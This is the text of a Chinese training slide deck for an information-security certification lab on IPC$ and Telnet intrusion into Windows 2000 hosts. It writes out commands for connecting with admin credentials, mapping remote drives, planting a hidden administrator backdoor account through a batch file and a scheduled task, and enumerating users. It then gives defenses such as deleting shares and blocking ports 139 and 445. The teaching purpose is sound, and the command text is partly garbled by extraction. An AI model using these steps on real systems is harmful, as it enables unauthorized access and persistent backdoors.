信息安全认证实验.ppt

信息安全认证培训实验 实验二 IPC 和Telnet入侵试验 教学目的与要求 掌握ipc 的概念 ipc 连接所使用的端口掌握ipc 链接的方法了解ipc 连接失败的常见原因掌握打开目标的IPC 共享以及其他共享的方法了解ipc 完整入侵步骤祥解掌握如何防范ipc 入侵仪器设备及用具 连网的个人计算机Windows2000系统平台 实验二 IPC 和Telnet入侵试验 实验准备 本机 开放IPC 共享已知远程主机的IP地址已知远程主机的管理员账号和密码 IPC 空连接除外 远程主机 开放IPC 共享启动server服务 实验二 IPC 和Telnet入侵试验 1 建立IPC 连接在命令提示符下键入命令 NETuse IP ipc 12345 user administrator2 映射网络驱动器把远程主机的C盘映射为本地磁盘Q盘netuseQ IP c 实验二 IPC 和Telnet入侵试验 3 留后门 1 编写建立后门账号的批处理程序打开记事本编写批处理程序 netusersysdoor12345 addnetlocalgroupadministratorssysdoor add 2 建立好后通过IPC 把他拷贝到目标主机 xcopy本地文件路径 文件名 远程主机IP 远程路径 实验二 IPC 和Telnet入侵试验 3 查看远程主机时间 4 制定执行后门程序的计划任务At IPtimecommond5 断开IPC 连接netuse IP IPC del6 建立空连接netuse IP ipc user 7 查看远程主机共享 看不到默认共享 netview IP8 得到远程主机的用户名列表nbtstat AIP 实验二 IPC 和Telnet入侵试验 IPC 安全解决方案1 删除默认共享1 察看本地共享资源运行 cmd 输入netshare2 删除共享 重起后默认共享仍然存在 netshareipc deletenetshareadmin deletenetsharec deletenetshared delete 如果有e f 可以继续删除 3 停止server服务 实验二 IPC 和Telnet入侵试验 2 屏蔽139 445端口1 139端口可以通过禁止NBT来屏蔽本地连接 TCP IT属性 高级 WINS 选 禁用TCP IT上的NETBIOS 一项2 445端口可以通过修改注册表来屏蔽添加一个键值Hive HKEY LOCAL MACHINEKey System Controlset Services NetBT ParametersName SMBDeviceEnabledType REG DWORDValue 0 实验二 IPC 和Telnet入侵试验 思考 如果不知道远程主机的用户名和口令 我们还能与远程主机进行连接并对远程主机进行控制吗 实验二 IPC 和Telnet入侵试验